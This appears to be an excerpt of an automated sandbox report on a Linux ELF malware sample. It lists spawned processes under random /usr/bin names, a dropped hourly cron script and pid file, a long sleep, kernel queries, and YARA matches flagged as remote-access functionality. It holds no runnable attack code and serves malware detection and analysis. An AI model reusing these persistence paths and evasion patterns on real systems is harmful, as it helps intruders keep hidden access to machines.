            Source: /usr/bin/uzqdvpyngy (PID: 6495)File: /usr/bin/uzqdvpyngyJump to behavior
            Source: /usr/bin/uzqdvpyngy (PID: 6499)File: /usr/bin/uzqdvpyngyJump to behavior
            Source: /usr/bin/uzqdvpyngy (PID: 6501)File: /usr/bin/uzqdvpyngyJump to behavior
            Source: /usr/bin/uzqdvpyngy (PID: 6502)File: /usr/bin/uzqdvpyngyJump to behavior
            Source: /usr/bin/bgoiqqymph (PID: 6507)File: /usr/bin/bgoiqqymphJump to behavior
            Source: /usr/bin/bgoiqqymph (PID: 6511)File: /usr/bin/bgoiqqymphJump to behavior
            Source: /usr/bin/bgoiqqymph (PID: 6515)File: /usr/bin/bgoiqqymphJump to behavior
            Source: /usr/bin/bgoiqqymph (PID: 6518)File: /usr/bin/bgoiqqymphJump to behavior
            Source: /usr/bin/bgoiqqymph (PID: 6519)File: /usr/bin/bgoiqqymphJump to behavior
            Source: /usr/bin/uhjkqkcgma (PID: 6527)File: /usr/bin/uhjkqkcgmaJump to behavior
            Source: /usr/bin/uhjkqkcgma (PID: 6532)File: /usr/bin/uhjkqkcgmaJump to behavior
            Source: /usr/bin/uhjkqkcgma (PID: 6535)File: /usr/bin/uhjkqkcgmaJump to behavior
            Source: /usr/bin/uhjkqkcgma (PID: 6538)File: /usr/bin/uhjkqkcgmaJump to behavior
            Source: /usr/bin/uhjkqkcgma (PID: 6539)File: /usr/bin/uhjkqkcgmaJump to behavior
            Source: /usr/bin/ksagqhmoao (PID: 6544)File: /usr/bin/ksagqhmoaoJump to behavior
            Source: /usr/bin/ksagqhmoao (PID: 6550)File: /usr/bin/ksagqhmoaoJump to behavior
            Source: /usr/bin/ksagqhmoao (PID: 6554)File: /usr/bin/ksagqhmoaoJump to behavior
            Source: /usr/bin/ksagqhmoao (PID: 6555)File: /usr/bin/ksagqhmoaoJump to behavior
            Source: /usr/bin/ksagqhmoao (PID: 6556)File: /usr/bin/ksagqhmoaoJump to behavior
            Source: /usr/bin/snluqxjnyb (PID: 6561)File: /usr/bin/snluqxjnybJump to behavior
            Source: /usr/bin/snluqxjnyb (PID: 6566)File: /usr/bin/snluqxjnybJump to behavior
            Source: /usr/bin/snluqxjnyb (PID: 6569)File: /usr/bin/snluqxjnybJump to behavior
            Source: /usr/bin/snluqxjnyb (PID: 6572)File: /usr/bin/snluqxjnybJump to behavior
            Source: /usr/bin/snluqxjnyb (PID: 6573)File: /usr/bin/snluqxjnybJump to behavior
            Source: /usr/bin/rfdcbxuezd (PID: 6578)File: /usr/bin/rfdcbxuezdJump to behavior
            Source: /usr/bin/rfdcbxuezd (PID: 6582)File: /usr/bin/rfdcbxuezdJump to behavior
            Source: /usr/bin/rfdcbxuezd (PID: 6586)File: /usr/bin/rfdcbxuezdJump to behavior
            Source: /usr/bin/rfdcbxuezd (PID: 6589)File: /usr/bin/rfdcbxuezdJump to behavior
            Source: /usr/bin/rfdcbxuezd (PID: 6590)File: /usr/bin/rfdcbxuezdJump to behavior
            Source: /usr/bin/nqjbkvhncc (PID: 6595)File: /usr/bin/nqjbkvhnccJump to behavior
            Source: /usr/bin/nqjbkvhncc (PID: 6600)File: /usr/bin/nqjbkvhnccJump to behavior
            Source: /usr/bin/nqjbkvhncc (PID: 6605)File: /usr/bin/nqjbkvhnccJump to behavior
            Source: /usr/bin/nqjbkvhncc (PID: 6606)File: /usr/bin/nqjbkvhnccJump to behavior
            Source: /usr/bin/nqjbkvhncc (PID: 6607)File: /usr/bin/nqjbkvhnccJump to behavior
            Source: /usr/bin/xzmsvqaqiz (PID: 6617)File: /usr/bin/xzmsvqaqizJump to behavior
            Source: /usr/bin/xzmsvqaqiz (PID: 6621)File: /usr/bin/xzmsvqaqizJump to behavior
            Source: /usr/bin/xzmsvqaqiz (PID: 6623)File: /usr/bin/xzmsvqaqizJump to behavior
            Source: /usr/bin/xzmsvqaqiz (PID: 6624)File: /usr/bin/xzmsvqaqizJump to behavior
            Source: /usr/bin/xzmsvqaqiz (PID: 6625)File: /usr/bin/xzmsvqaqizJump to behavior
            Source: /usr/bin/bbdupdfrbl (PID: 6635)File: /usr/bin/bbdupdfrblJump to behavior
            Source: /usr/bin/bbdupdfrbl (PID: 6638)File: /usr/bin/bbdupdfrblJump to behavior
            Source: /usr/bin/bbdupdfrbl (PID: 6641)File: /usr/bin/bbdupdfrblJump to behavior
            Source: /usr/bin/bbdupdfrbl (PID: 6642)File: /usr/bin/bbdupdfrblJump to behavior
            Source: /usr/bin/bbdupdfrbl (PID: 6643)File: /usr/bin/bbdupdfrblJump to behavior
            Source: /usr/bin/lqmgtequuz (PID: 6649)File: /usr/bin/lqmgtequuzJump to behavior
            Source: /usr/bin/lqmgtequuz (PID: 6653)File: /usr/bin/lqmgtequuzJump to behavior
            Source: /usr/bin/lqmgtequuz (PID: 6659)File: /usr/bin/lqmgtequuzJump to behavior
            Source: /usr/bin/lqmgtequuz (PID: 6658)File: /usr/bin/lqmgtequuzJump to behavior
            Source: /usr/bin/lqmgtequuz (PID: 6660)File: /usr/bin/lqmgtequuzJump to behavior
            Source: /usr/bin/vzezokfask (PID: 6670)File: /usr/bin/vzezokfaskJump to behavior
            Source: /usr/bin/vzezokfask (PID: 6675)File: /usr/bin/vzezokfaskJump to behavior
            Source: /usr/bin/vzezokfask (PID: 6677)File: /usr/bin/vzezokfaskJump to behavior
            Source: /usr/bin/vzezokfask (PID: 6678)File: /usr/bin/vzezokfaskJump to behavior
            Source: /usr/bin/vzezokfask (PID: 6679)File: /usr/bin/vzezokfaskJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)Path: /etc/cron.hourly/gcc.shJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)Path: /run/gcc.pidJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)Sleeps longer then 60s: 1800.0sJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6260)Queries kernel information via 'uname': Jump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/oigyzaiygp (PID: 6294)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/oigyzaiygp (PID: 6297)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/oigyzaiygp (PID: 6300)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/oigyzaiygp (PID: 6302)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/oigyzaiygp (PID: 6305)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/sosfbbrzmx (PID: 6312)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/sosfbbrzmx (PID: 6315)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/sosfbbrzmx (PID: 6317)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/sosfbbrzmx (PID: 6320)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/sosfbbrzmx (PID: 6323)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/gphlkawhxw (PID: 6329)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/gphlkawhxw (PID: 6332)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/gphlkawhxw (PID: 6334)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/gphlkawhxw (PID: 6336)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/gphlkawhxw (PID: 6339)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/vnihfmehfy (PID: 6365)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/vnihfmehfy (PID: 6368)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/vnihfmehfy (PID: 6370)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/vnihfmehfy (PID: 6373)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/vnihfmehfy (PID: 6376)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/eqoogeqyds (PID: 6382)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/eqoogeqyds (PID: 6387)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/eqoogeqyds (PID: 6390)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/eqoogeqyds (PID: 6392)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/eqoogeqyds (PID: 6395)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/otlzwyqefc (PID: 6401)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/otlzwyqefc (PID: 6404)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/otlzwyqefc (PID: 6406)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/otlzwyqefc (PID: 6409)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/otlzwyqefc (PID: 6411)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/dthtwwmqvu (PID: 6418)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/dthtwwmqvu (PID: 6421)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/dthtwwmqvu (PID: 6423)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/dthtwwmqvu (PID: 6426)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/dthtwwmqvu (PID: 6429)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/jeyjdycnpv (PID: 6436)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/jeyjdycnpv (PID: 6439)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/jeyjdycnpv (PID: 6441)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/jeyjdycnpv (PID: 6444)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/jeyjdycnpv (PID: 6447)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/wutujskjnm (PID: 6453)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/wutujskjnm (PID: 6456)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/wutujskjnm (PID: 6458)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/wutujskjnm (PID: 6461)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/wutujskjnm (PID: 6464)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/qxzsiorokf (PID: 6472)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/qxzsiorokf (PID: 6475)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/qxzsiorokf (PID: 6477)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/qxzsiorokf (PID: 6481)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/qxzsiorokf (PID: 6483)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/uzqdvpyngy (PID: 6489)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/uzqdvpyngy (PID: 6492)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/uzqdvpyngy (PID: 6494)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/uzqdvpyngy (PID: 6497)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/uzqdvpyngy (PID: 6500)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/bgoiqqymph (PID: 6506)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/bgoiqqymph (PID: 6509)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/bgoiqqymph (PID: 6512)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/bgoiqqymph (PID: 6514)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/bgoiqqymph (PID: 6517)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/uhjkqkcgma (PID: 6526)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/uhjkqkcgma (PID: 6529)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/uhjkqkcgma (PID: 6531)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/uhjkqkcgma (PID: 6534)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/uhjkqkcgma (PID: 6537)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/ksagqhmoao (PID: 6543)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/ksagqhmoao (PID: 6546)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/ksagqhmoao (PID: 6548)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/ksagqhmoao (PID: 6551)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/ksagqhmoao (PID: 6553)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/snluqxjnyb (PID: 6560)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/snluqxjnyb (PID: 6563)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/snluqxjnyb (PID: 6565)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/snluqxjnyb (PID: 6568)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/snluqxjnyb (PID: 6571)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/rfdcbxuezd (PID: 6577)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/rfdcbxuezd (PID: 6580)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/rfdcbxuezd (PID: 6583)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/rfdcbxuezd (PID: 6585)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/rfdcbxuezd (PID: 6588)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/nqjbkvhncc (PID: 6594)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/nqjbkvhncc (PID: 6597)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/nqjbkvhncc (PID: 6599)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/nqjbkvhncc (PID: 6602)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/nqjbkvhncc (PID: 6604)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/xzmsvqaqiz (PID: 6612)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/xzmsvqaqiz (PID: 6614)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/xzmsvqaqiz (PID: 6616)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/xzmsvqaqiz (PID: 6619)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/xzmsvqaqiz (PID: 6622)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/bbdupdfrbl (PID: 6630)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/bbdupdfrbl (PID: 6632)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/bbdupdfrbl (PID: 6634)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/bbdupdfrbl (PID: 6637)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/bbdupdfrbl (PID: 6640)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/lqmgtequuz (PID: 6647)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/lqmgtequuz (PID: 6650)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/lqmgtequuz (PID: 6652)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/lqmgtequuz (PID: 6655)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/lqmgtequuz (PID: 6657)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/vzezokfask (PID: 6666)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/vzezokfask (PID: 6668)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/vzezokfask (PID: 6671)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/vzezokfask (PID: 6673)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/vzezokfask (PID: 6676)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/skjzlhozvl (PID: 6683)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/skjzlhozvl (PID: 6685)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/skjzlhozvl (PID: 6687)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/skjzlhozvl (PID: 6690)Queries kernel information via 'uname': Jump to behavior
            Source: /usr/bin/skjzlhozvl (PID: 6692)Queries kernel information via 'uname': Jump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: UDMp3dZ7nc.elf, type: SAMPLE
            Source: Yara matchFile source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6260, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6262, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6263, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6264, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6293, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6296, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6298, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6301, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6303, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6311, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6314, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6316, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6319, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6322, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6328, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6331, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6333, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6335, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6338, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6364, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6367, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6369, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6375, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6381, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6386, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6391, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6394, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6403, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6405, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6408, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6410, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6417, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6420, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6422, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6425, type: MEMORYSTR
